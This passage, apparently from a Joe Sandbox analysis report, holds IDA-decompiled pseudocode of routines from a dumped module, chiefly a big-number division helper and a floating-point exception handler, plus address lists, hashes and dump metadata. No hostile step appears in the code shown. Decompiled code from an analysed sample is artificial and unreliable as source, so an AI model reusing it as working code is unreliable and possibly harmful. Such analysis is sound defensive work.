                                                                                        											_t373 = _t373 - 4;
                                                                                        											_v20 = _t262;
                                                                                        											_t342 = _t295;
                                                                                        											_t303 = 0 + _t253;
                                                                                        											asm("adc ecx, 0x0");
                                                                                        											_v12 = _t303;
                                                                                        											_t34 =  &_v32;
                                                                                        											 *_t34 = _v32 - 1;
                                                                                        											__eflags =  *_t34;
                                                                                        											_v8 = _v12;
                                                                                        											_t295 = _v44;
                                                                                        										} while ( *_t34 != 0);
                                                                                        										_t262 = _a4;
                                                                                        									}
                                                                                        									_v544 = 0;
                                                                                        									_t41 =  &(_t262[1]); // 0x4
                                                                                        									_t370 = _t41;
                                                                                        									 *_t262 = 0;
                                                                                        									E1000BBAD(_t370, 0x1cc,  &_v540, 0);
                                                                                        									_t247 = _v20;
                                                                                        									__eflags = 0 - _t247;
                                                                                        									 *_t370 = _t342;
                                                                                        									_t262[2] = _t247;
                                                                                        									asm("sbb ecx, ecx");
                                                                                        									__eflags =  ~0x00000000;
                                                                                        									 *_t262 = 0xbadbae;
                                                                                        									return _v12;
                                                                                        								} else {
                                                                                        									_t14 =  &(_t262[1]); // 0x4
                                                                                        									_t344 = _t14;
                                                                                        									_v544 = 0;
                                                                                        									 *_t262 = 0;
                                                                                        									E1000BBAD(_t344, 0x1cc,  &_v540, 0);
                                                                                        									_t256 = _t262[1];
                                                                                        									_t322 = _t256 % _v44;
                                                                                        									__eflags = 0 - _t322;
                                                                                        									 *_t344 = _t322;
                                                                                        									asm("sbb ecx, ecx");
                                                                                        									__eflags = 0;
                                                                                        									 *_t262 =  ~0x00000000;
                                                                                        									return _t256 / _v44;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t9 =  &(_t262[1]); // 0x4
                                                                                        								_v544 = _t198;
                                                                                        								 *_t262 = _t198;
                                                                                        								E1000BBAD(_t9, 0x1cc,  &_v540, _t198);
                                                                                        								__eflags = 0;
                                                                                        								return _t262[1];
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						__eflags = 0;
                                                                                        						return 0;
                                                                                        					}
                                                                                        				} else {
                                                                                        					return _t197;
                                                                                        				}
                                                                                        			}























































































                                                                                        0x1000cb3c
                                                                                        0x1000cb3f
                                                                                        0x1000cb43
                                                                                        0x1000cb4d
                                                                                        0x1000cb50
                                                                                        0x1000cb52
                                                                                        0x1000cb54
                                                                                        0x1000cb61
                                                                                        0x1000cb61
                                                                                        0x1000cb64
                                                                                        0x1000cb64
                                                                                        0x1000cb67
                                                                                        0x1000cb6a
                                                                                        0x1000cb6c
                                                                                        0x1000cc9f
                                                                                        0x1000cca1
                                                                                        0x1000ccea
                                                                                        0x1000ccee
                                                                                        0x1000ccf4
                                                                                        0x1000cca3
                                                                                        0x1000cca5
                                                                                        0x1000cca8
                                                                                        0x1000ccaa
                                                                                        0x1000ccad
                                                                                        0x1000ccaf
                                                                                        0x1000ccb1
                                                                                        0x1000cce5
                                                                                        0x1000cce5
                                                                                        0x1000cce5
                                                                                        0x1000ccb3
                                                                                        0x1000ccb8
                                                                                        0x1000ccbe
                                                                                        0x1000ccbe
                                                                                        0x1000ccc1
                                                                                        0x1000ccc3
                                                                                        0x1000ccc5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000ccc7
                                                                                        0x1000ccc8
                                                                                        0x1000cccb
                                                                                        0x1000ccce
                                                                                        0x1000ccd0
                                                                                        0x00000000
                                                                                        0x1000ccd2
                                                                                        0x00000000
                                                                                        0x1000ccd2
                                                                                        0x00000000
                                                                                        0x1000ccd0
                                                                                        0x1000ccd4
                                                                                        0x1000ccdb
                                                                                        0x1000ccdf
                                                                                        0x1000cce3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000cce3
                                                                                        0x1000cce6
                                                                                        0x1000cce6
                                                                                        0x1000cce8
                                                                                        0x1000ccf5
                                                                                        0x1000ccf8
                                                                                        0x1000ccfb
                                                                                        0x1000ccfe
                                                                                        0x1000ccfe
                                                                                        0x1000cd02
                                                                                        0x1000cd05
                                                                                        0x1000cd08
                                                                                        0x1000cd0b
                                                                                        0x1000cd16
                                                                                        0x1000cd0d
                                                                                        0x1000cd12
                                                                                        0x1000cd12
                                                                                        0x1000cd20
                                                                                        0x1000cd25
                                                                                        0x1000cd28
                                                                                        0x1000cd2a
                                                                                        0x1000cd34
                                                                                        0x1000cd37
                                                                                        0x1000cd3e
                                                                                        0x1000cd41
                                                                                        0x1000cd44
                                                                                        0x1000cd4c
                                                                                        0x1000cd52
                                                                                        0x1000cd52
                                                                                        0x1000cd52
                                                                                        0x1000cd52
                                                                                        0x1000cd44
                                                                                        0x1000cd57
                                                                                        0x1000cd5e
                                                                                        0x1000cd5e
                                                                                        0x1000cd61
                                                                                        0x1000cd64
                                                                                        0x1000cf96
                                                                                        0x1000cf96
                                                                                        0x1000cd6a
                                                                                        0x1000cd6a
                                                                                        0x1000cd70
                                                                                        0x1000cd73
                                                                                        0x1000cd76
                                                                                        0x1000cd79
                                                                                        0x1000cd7c
                                                                                        0x1000cd7f
                                                                                        0x1000cd82
                                                                                        0x1000cd82
                                                                                        0x1000cd85
                                                                                        0x1000cd8c
                                                                                        0x1000cd8c
                                                                                        0x1000cd87
                                                                                        0x1000cd87
                                                                                        0x1000cd87
                                                                                        0x1000cd8e
                                                                                        0x1000cd92
                                                                                        0x1000cd95
                                                                                        0x1000cd97
                                                                                        0x1000cd9a
                                                                                        0x1000cda1
                                                                                        0x1000cda4
                                                                                        0x1000cda7
                                                                                        0x1000cdb2
                                                                                        0x1000cdb5
                                                                                        0x1000cdba
                                                                                        0x1000cdbf
                                                                                        0x1000cdc6
                                                                                        0x1000cdcb
                                                                                        0x1000cdcd
                                                                                        0x1000cdcf
                                                                                        0x1000cdd3
                                                                                        0x1000cdd6
                                                                                        0x1000cdd9
                                                                                        0x1000cde1
                                                                                        0x1000cdea
                                                                                        0x1000cdea
                                                                                        0x1000cdec
                                                                                        0x1000cdef
                                                                                        0x1000cdef
                                                                                        0x1000cdd9
                                                                                        0x1000cdf9
                                                                                        0x1000cdfe
                                                                                        0x1000ce03
                                                                                        0x1000ce05
                                                                                        0x1000ce08
                                                                                        0x1000ce0a
                                                                                        0x1000ce0d
                                                                                        0x1000ce10
                                                                                        0x1000ce12
                                                                                        0x1000ce15
                                                                                        0x1000ce18
                                                                                        0x1000ce1a
                                                                                        0x1000ce21
                                                                                        0x1000ce26
                                                                                        0x1000ce29
                                                                                        0x1000ce33
                                                                                        0x1000ce35
                                                                                        0x1000ce37
                                                                                        0x1000ce3a
                                                                                        0x1000ce3a
                                                                                        0x1000ce3c
                                                                                        0x1000ce3f
                                                                                        0x1000ce42
                                                                                        0x1000ce45
                                                                                        0x1000ce48
                                                                                        0x1000ce1c
                                                                                        0x1000ce1c
                                                                                        0x1000ce1f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000ce1f
                                                                                        0x1000ce4b
                                                                                        0x1000ce4d
                                                                                        0x1000ce4f
                                                                                        0x00000000
                                                                                        0x1000ce51
                                                                                        0x1000ce51
                                                                                        0x1000ce54
                                                                                        0x1000ce56
                                                                                        0x1000ce56
                                                                                        0x1000ce64
                                                                                        0x1000ce67
                                                                                        0x1000ce6c
                                                                                        0x1000ce6e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000ce70
                                                                                        0x1000ce77
                                                                                        0x1000ce77
                                                                                        0x1000ce7a
                                                                                        0x1000ce7d
                                                                                        0x1000ce80
                                                                                        0x1000ce83
                                                                                        0x1000ce83
                                                                                        0x1000ce86
                                                                                        0x1000ce89
                                                                                        0x1000ce8d
                                                                                        0x1000ce90
                                                                                        0x1000ce92
                                                                                        0x1000ce95
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000ce97
                                                                                        0x1000ce95
                                                                                        0x1000ce72
                                                                                        0x1000ce72
                                                                                        0x1000ce75
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000ce75
                                                                                        0x1000ce9c
                                                                                        0x1000ce9c
                                                                                        0x00000000
                                                                                        0x1000ce9c
                                                                                        0x1000ce99
                                                                                        0x00000000
                                                                                        0x1000ce99
                                                                                        0x1000ce54
                                                                                        0x1000ce4f
                                                                                        0x1000ce9f
                                                                                        0x1000ce9f
                                                                                        0x1000cea1
                                                                                        0x1000ceab
                                                                                        0x1000ceab
                                                                                        0x1000ceae
                                                                                        0x1000ceb0
                                                                                        0x1000ceb2
                                                                                        0x1000ceb4
                                                                                        0x1000ceb9
                                                                                        0x1000cebc
                                                                                        0x1000cebc
                                                                                        0x1000cebf
                                                                                        0x1000cec2
                                                                                        0x1000cec5
                                                                                        0x1000cec7
                                                                                        0x1000cedc
                                                                                        0x1000cede
                                                                                        0x1000cee0
                                                                                        0x1000cee2
                                                                                        0x1000cee4
                                                                                        0x1000cee6
                                                                                        0x1000cee8
                                                                                        0x1000ceea
                                                                                        0x1000ceed
                                                                                        0x1000ceed
                                                                                        0x1000cef1
                                                                                        0x1000cef3
                                                                                        0x1000cef9
                                                                                        0x1000cefc
                                                                                        0x1000cefc
                                                                                        0x1000cefc
                                                                                        0x1000cf00
                                                                                        0x1000cf00
                                                                                        0x1000cf05
                                                                                        0x1000cf08
                                                                                        0x1000cf08
                                                                                        0x1000cf0d
                                                                                        0x1000cf0f
                                                                                        0x1000cf11
                                                                                        0x1000cf18
                                                                                        0x1000cf18
                                                                                        0x1000cf1a
                                                                                        0x1000cf1f
                                                                                        0x1000cf21
                                                                                        0x1000cf24
                                                                                        0x1000cf24
                                                                                        0x1000cf27
                                                                                        0x1000cf30
                                                                                        0x1000cf30
                                                                                        0x1000cf32
                                                                                        0x1000cf32
                                                                                        0x1000cf37
                                                                                        0x1000cf3d
                                                                                        0x1000cf41
                                                                                        0x1000cf44
                                                                                        0x1000cf47
                                                                                        0x1000cf49
                                                                                        0x1000cf49
                                                                                        0x1000cf49
                                                                                        0x1000cf4e
                                                                                        0x1000cf4e
                                                                                        0x1000cf51
                                                                                        0x1000cf54
                                                                                        0x1000cf13
                                                                                        0x1000cf13
                                                                                        0x1000cf16
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000cf16
                                                                                        0x1000cf11
                                                                                        0x1000cf5b
                                                                                        0x1000cf5b
                                                                                        0x1000cf5c
                                                                                        0x1000cea3
                                                                                        0x1000cea3
                                                                                        0x1000cea5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000cea5
                                                                                        0x1000cf6c
                                                                                        0x1000cf71
                                                                                        0x1000cf74
                                                                                        0x1000cf78
                                                                                        0x1000cf79
                                                                                        0x1000cf7c
                                                                                        0x1000cf7f
                                                                                        0x1000cf80
                                                                                        0x1000cf83
                                                                                        0x1000cf86
                                                                                        0x1000cf89
                                                                                        0x1000cf8c
                                                                                        0x1000cf8c
                                                                                        0x1000cf94
                                                                                        0x1000cf9b
                                                                                        0x1000cf9c
                                                                                        0x1000cf9e
                                                                                        0x1000cfa0
                                                                                        0x1000cfa2
                                                                                        0x1000cfa5
                                                                                        0x1000cfb0
                                                                                        0x1000cfb0
                                                                                        0x1000cfb6
                                                                                        0x1000cfb6
                                                                                        0x1000cfb9
                                                                                        0x1000cfba
                                                                                        0x1000cfba
                                                                                        0x1000cfb0
                                                                                        0x1000cfbe
                                                                                        0x1000cfc0
                                                                                        0x1000cfc2
                                                                                        0x1000cfc4
                                                                                        0x1000cfc4
                                                                                        0x1000cfc6
                                                                                        0x1000cfca
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000cfcc
                                                                                        0x1000cfcc
                                                                                        0x1000cfcf
                                                                                        0x1000cfd1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000cfd1
                                                                                        0x1000cfc4
                                                                                        0x1000cfd3
                                                                                        0x1000cfdd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000cce8
                                                                                        0x1000cb72
                                                                                        0x1000cb72
                                                                                        0x1000cb72
                                                                                        0x1000cb75
                                                                                        0x1000cb78
                                                                                        0x1000cb7b
                                                                                        0x1000cbac
                                                                                        0x1000cbae
                                                                                        0x1000cbf9
                                                                                        0x1000cbfb
                                                                                        0x1000cc02
                                                                                        0x1000cc09
                                                                                        0x1000cc0c
                                                                                        0x1000cc0f
                                                                                        0x1000cc15
                                                                                        0x1000cc15
                                                                                        0x1000cc16
                                                                                        0x1000cc19
                                                                                        0x1000cc20
                                                                                        0x1000cc29
                                                                                        0x1000cc2e
                                                                                        0x1000cc31
                                                                                        0x1000cc36
                                                                                        0x1000cc39
                                                                                        0x1000cc3b
                                                                                        0x1000cc40
                                                                                        0x1000cc43
                                                                                        0x1000cc46
                                                                                        0x1000cc46
                                                                                        0x1000cc46
                                                                                        0x1000cc4a
                                                                                        0x1000cc4d
                                                                                        0x1000cc4d
                                                                                        0x1000cc52
                                                                                        0x1000cc52
                                                                                        0x1000cc5d
                                                                                        0x1000cc68
                                                                                        0x1000cc68
                                                                                        0x1000cc6b
                                                                                        0x1000cc77
                                                                                        0x1000cc7c
                                                                                        0x1000cc87
                                                                                        0x1000cc89
                                                                                        0x1000cc8b
                                                                                        0x1000cc91
                                                                                        0x1000cc96
                                                                                        0x1000cc98
                                                                                        0x1000cc9e
                                                                                        0x1000cbb0
                                                                                        0x1000cbbc
                                                                                        0x1000cbbc
                                                                                        0x1000cbbf
                                                                                        0x1000cbcf
                                                                                        0x1000cbd5
                                                                                        0x1000cbdc
                                                                                        0x1000cbde
                                                                                        0x1000cbe6
                                                                                        0x1000cbe8
                                                                                        0x1000cbea
                                                                                        0x1000cbef
                                                                                        0x1000cbf2
                                                                                        0x1000cbf8
                                                                                        0x1000cbf8
                                                                                        0x1000cb7d
                                                                                        0x1000cb80
                                                                                        0x1000cb84
                                                                                        0x1000cb8a
                                                                                        0x1000cb99
                                                                                        0x1000cba3
                                                                                        0x1000cbab
                                                                                        0x1000cbab
                                                                                        0x1000cb7b
                                                                                        0x1000cb56
                                                                                        0x1000cb59
                                                                                        0x1000cb5f
                                                                                        0x1000cb5f
                                                                                        0x1000cb45
                                                                                        0x1000cb4b
                                                                                        0x1000cb4b

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 36481e6cd6a95721b40532c089edfd922138aec6096a59f66dd99292e8a4b073
                                                                                        • Instruction ID: 05cd0627ff4e00f64f5c675026f94333b44918c06ba27d88297c01fa19a69788
                                                                                        • Opcode Fuzzy Hash: 36481e6cd6a95721b40532c089edfd922138aec6096a59f66dd99292e8a4b073
                                                                                        • Instruction Fuzzy Hash: 26020C71E002199FEF14CFA9C890A9DBBF1FF48354F25816AE919E7384D731A9418B91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E10011C88(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                                                        				signed int _t172;
                                                                                        				signed int _t175;
                                                                                        				signed int _t178;
                                                                                        				signed int* _t179;
                                                                                        				signed int _t195;
                                                                                        				signed int _t199;
                                                                                        				signed int _t202;
                                                                                        				void* _t203;
                                                                                        				void* _t206;
                                                                                        				signed int _t209;
                                                                                        				void* _t210;
                                                                                        				signed int _t225;
                                                                                        				unsigned int* _t240;
                                                                                        				signed char _t242;
                                                                                        				signed int* _t250;
                                                                                        				unsigned int* _t256;
                                                                                        				signed int* _t257;
                                                                                        				signed char _t259;
                                                                                        				long _t262;
                                                                                        				signed int* _t265;
                                                                                        
                                                                                        				 *(_a4 + 4) = 0;
                                                                                        				_t262 = 0xc000000d;
                                                                                        				 *(_a4 + 8) = 0;
                                                                                        				 *(_a4 + 0xc) = 0;
                                                                                        				_t242 = _a12;
                                                                                        				if((_t242 & 0x00000010) != 0) {
                                                                                        					_t262 = 0xc000008f;
                                                                                        					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                                                        				}
                                                                                        				if((_t242 & 0x00000002) != 0) {
                                                                                        					_t262 = 0xc0000093;
                                                                                        					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                                                        				}
                                                                                        				if((_t242 & 0x00000001) != 0) {
                                                                                        					_t262 = 0xc0000091;
                                                                                        					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                                                        				}
                                                                                        				if((_t242 & 0x00000004) != 0) {
                                                                                        					_t262 = 0xc000008e;
                                                                                        					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                        				}
                                                                                        				if((_t242 & 0x00000008) != 0) {
                                                                                        					_t262 = 0xc0000090;
                                                                                        					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                                                        				}
                                                                                        				_t265 = _a8;
                                                                                        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                                                        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                                                        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                                                        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                                                        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                                                        				_t259 = E100116BB(_a4);
                                                                                        				if((_t259 & 0x00000001) != 0) {
                                                                                        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                                                        				}
                                                                                        				if((_t259 & 0x00000004) != 0) {
                                                                                        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                                                        				}
                                                                                        				if((_t259 & 0x00000008) != 0) {
                                                                                        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                                                        				}
                                                                                        				if((_t259 & 0x00000010) != 0) {
                                                                                        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                                                        				}
                                                                                        				if((_t259 & 0x00000020) != 0) {
                                                                                        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                                                        				}
                                                                                        				_t172 =  *_t265 & 0x00000c00;
                                                                                        				if(_t172 == 0) {
                                                                                        					 *_a4 =  *_a4 & 0xfffffffc;
                                                                                        				} else {
                                                                                        					if(_t172 == 0x400) {
                                                                                        						_t257 = _a4;
                                                                                        						_t225 =  *_t257 & 0xfffffffd | 1;
                                                                                        						L26:
                                                                                        						 *_t257 = _t225;
                                                                                        						L29:
                                                                                        						_t175 =  *_t265 & 0x00000300;
                                                                                        						if(_t175 == 0) {
                                                                                        							_t250 = _a4;
                                                                                        							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                                                        							L35:
                                                                                        							 *_t250 = _t178;
                                                                                        							L36:
                                                                                        							_t179 = _a4;
                                                                                        							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                        							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                        							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                                                        							if(_a28 == 0) {
                                                                                        								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                                                        								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                                                        								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                        								_t254 = _a4;
                                                                                        								_t240 = _a24;
                                                                                        								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                                                        								 *(_a4 + 0x50) =  *_t240;
                                                                                        							} else {
                                                                                        								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                                                        								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                                                        								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                        								_t240 = _a24;
                                                                                        								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                                                        								 *(_a4 + 0x50) =  *_t240;
                                                                                        							}
                                                                                        							E10011621(_t254);
                                                                                        							RaiseException(_t262, 0, 1,  &_a4);
                                                                                        							_t256 = _a4;
                                                                                        							if((_t256[2] & 0x00000010) != 0) {
                                                                                        								 *_t265 =  *_t265 & 0xfffffffe;
                                                                                        							}
                                                                                        							if((_t256[2] & 0x00000008) != 0) {
                                                                                        								 *_t265 =  *_t265 & 0xfffffffb;
                                                                                        							}
                                                                                        							if((_t256[2] & 0x00000004) != 0) {
                                                                                        								 *_t265 =  *_t265 & 0xfffffff7;
                                                                                        							}
                                                                                        							if((_t256[2] & 0x00000002) != 0) {
                                                                                        								 *_t265 =  *_t265 & 0xffffffef;
                                                                                        							}
                                                                                        							if((_t256[2] & 0x00000001) != 0) {
                                                                                        								 *_t265 =  *_t265 & 0xffffffdf;
                                                                                        							}
                                                                                        							_t195 =  *_t256 & 0x00000003;
                                                                                        							if(_t195 == 0) {
                                                                                        								 *_t265 =  *_t265 & 0xfffff3ff;
                                                                                        							} else {
                                                                                        								_t206 = _t195 - 1;
                                                                                        								if(_t206 == 0) {
                                                                                        									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                                                        									L55:
                                                                                        									 *_t265 = _t209;
                                                                                        									L58:
                                                                                        									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                                                        									if(_t199 == 0) {
                                                                                        										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                                                        										L64:
                                                                                        										 *_t265 = _t202;
                                                                                        										L65:
                                                                                        										if(_a28 == 0) {
                                                                                        											 *_t240 = _t256[0x14];
                                                                                        										} else {
                                                                                        											 *_t240 = _t256[0x14];
                                                                                        										}
                                                                                        										return _t202;
                                                                                        									}
                                                                                        									_t203 = _t199 - 1;
                                                                                        									if(_t203 == 0) {
                                                                                        										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                                                        										goto L64;
                                                                                        									}
                                                                                        									_t202 = _t203 - 1;
                                                                                        									if(_t202 == 0) {
                                                                                        										 *_t265 =  *_t265 & 0xfffff3ff;
                                                                                        									}
                                                                                        									goto L65;
                                                                                        								}
                                                                                        								_t210 = _t206 - 1;
                                                                                        								if(_t210 == 0) {
                                                                                        									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                                                        									goto L55;
                                                                                        								}
                                                                                        								if(_t210 == 1) {
                                                                                        									 *_t265 =  *_t265 | 0x00000c00;
                                                                                        								}
                                                                                        							}
                                                                                        							goto L58;
                                                                                        						}
                                                                                        						if(_t175 == 0x200) {
                                                                                        							_t250 = _a4;
                                                                                        							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                                                        							goto L35;
                                                                                        						}
                                                                                        						if(_t175 == 0x300) {
                                                                                        							 *_a4 =  *_a4 & 0xffffffe3;
                                                                                        						}
                                                                                        						goto L36;
                                                                                        					}
                                                                                        					if(_t172 == 0x800) {
                                                                                        						_t257 = _a4;
                                                                                        						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                                                        						goto L26;
                                                                                        					}
                                                                                        					if(_t172 == 0xc00) {
                                                                                        						 *_a4 =  *_a4 | 0x00000003;
                                                                                        					}
                                                                                        				}
                                                                                        			}























                                                                                        0x10011c96
                                                                                        0x10011c9d
                                                                                        0x10011ca2
                                                                                        0x10011ca8
                                                                                        0x10011cab
                                                                                        0x10011cb1
                                                                                        0x10011cb6
                                                                                        0x10011cbb
                                                                                        0x10011cbb
                                                                                        0x10011cc1
                                                                                        0x10011cc6
                                                                                        0x10011ccb
                                                                                        0x10011ccb
                                                                                        0x10011cd2
                                                                                        0x10011cd7
                                                                                        0x10011cdc
                                                                                        0x10011cdc
                                                                                        0x10011ce3
                                                                                        0x10011ce8
                                                                                        0x10011ced
                                                                                        0x10011ced
                                                                                        0x10011cf4
                                                                                        0x10011cf9
                                                                                        0x10011cfe
                                                                                        0x10011cfe
                                                                                        0x10011d06
                                                                                        0x10011d16
                                                                                        0x10011d28
                                                                                        0x10011d3a
                                                                                        0x10011d4d
                                                                                        0x10011d5f
                                                                                        0x10011d67
                                                                                        0x10011d6c
                                                                                        0x10011d71
                                                                                        0x10011d71
                                                                                        0x10011d78
                                                                                        0x10011d7d
                                                                                        0x10011d7d
                                                                                        0x10011d84
                                                                                        0x10011d89
                                                                                        0x10011d89
                                                                                        0x10011d90
                                                                                        0x10011d95
                                                                                        0x10011d95
                                                                                        0x10011d9c
                                                                                        0x10011da1
                                                                                        0x10011da1
                                                                                        0x10011dab
                                                                                        0x10011dad
                                                                                        0x10011de7
                                                                                        0x10011daf
                                                                                        0x10011db4
                                                                                        0x10011dd8
                                                                                        0x10011de0
                                                                                        0x10011dd4
                                                                                        0x10011dd4
                                                                                        0x10011dea
                                                                                        0x10011df1
                                                                                        0x10011df3
                                                                                        0x10011e15
                                                                                        0x10011e1d
                                                                                        0x10011e20
                                                                                        0x10011e20
                                                                                        0x10011e22
                                                                                        0x10011e22
                                                                                        0x10011e2d
                                                                                        0x10011e33
                                                                                        0x10011e38
                                                                                        0x10011e3f
                                                                                        0x10011e79
                                                                                        0x10011e84
                                                                                        0x10011e8a
                                                                                        0x10011e8d
                                                                                        0x10011e90
                                                                                        0x10011e9c
                                                                                        0x10011ea4
                                                                                        0x10011e41
                                                                                        0x10011e44
                                                                                        0x10011e50
                                                                                        0x10011e56
                                                                                        0x10011e5c
                                                                                        0x10011e5f
                                                                                        0x10011e68
                                                                                        0x10011e68
                                                                                        0x10011ea7
                                                                                        0x10011eb5
                                                                                        0x10011ebb
                                                                                        0x10011ec2
                                                                                        0x10011ec4
                                                                                        0x10011ec4
                                                                                        0x10011ecb
                                                                                        0x10011ecd
                                                                                        0x10011ecd
                                                                                        0x10011ed4
                                                                                        0x10011ed6
                                                                                        0x10011ed6
                                                                                        0x10011edd
                                                                                        0x10011edf
                                                                                        0x10011edf
                                                                                        0x10011ee6
                                                                                        0x10011ee8
                                                                                        0x10011ee8
                                                                                        0x10011ef5
                                                                                        0x10011ef8
                                                                                        0x10011f2f
                                                                                        0x10011efa
                                                                                        0x10011efa
                                                                                        0x10011efd
                                                                                        0x10011f28
                                                                                        0x10011f1d
                                                                                        0x10011f1d
                                                                                        0x10011f31
                                                                                        0x10011f39
                                                                                        0x10011f3c
                                                                                        0x10011f5b
                                                                                        0x10011f60
                                                                                        0x10011f60
                                                                                        0x10011f62
                                                                                        0x10011f67
                                                                                        0x10011f73
                                                                                        0x10011f69
                                                                                        0x10011f6c
                                                                                        0x10011f6c
                                                                                        0x10011f78
                                                                                        0x10011f78
                                                                                        0x10011f3e
                                                                                        0x10011f41
                                                                                        0x10011f50
                                                                                        0x00000000
                                                                                        0x10011f50
                                                                                        0x10011f43
                                                                                        0x10011f46
                                                                                        0x10011f48
                                                                                        0x10011f48
                                                                                        0x00000000
                                                                                        0x10011f46
                                                                                        0x10011eff
                                                                                        0x10011f02
                                                                                        0x10011f18
                                                                                        0x00000000
                                                                                        0x10011f18
                                                                                        0x10011f07
                                                                                        0x10011f09
                                                                                        0x10011f09
                                                                                        0x10011f07
                                                                                        0x00000000
                                                                                        0x10011ef8
                                                                                        0x10011dfa
                                                                                        0x10011e08
                                                                                        0x10011e10
                                                                                        0x00000000
                                                                                        0x10011e10
                                                                                        0x10011dfe
                                                                                        0x10011e03
                                                                                        0x10011e03
                                                                                        0x00000000
                                                                                        0x10011dfe
                                                                                        0x10011dbb
                                                                                        0x10011dc9
                                                                                        0x10011dd1
                                                                                        0x00000000
                                                                                        0x10011dd1
                                                                                        0x10011dbf
                                                                                        0x10011dc4
                                                                                        0x10011dc4
                                                                                        0x10011dbf

                                                                                        APIs
                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,10011C83,?,?,00000008,?,?,10011923,00000000), ref: 10011EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
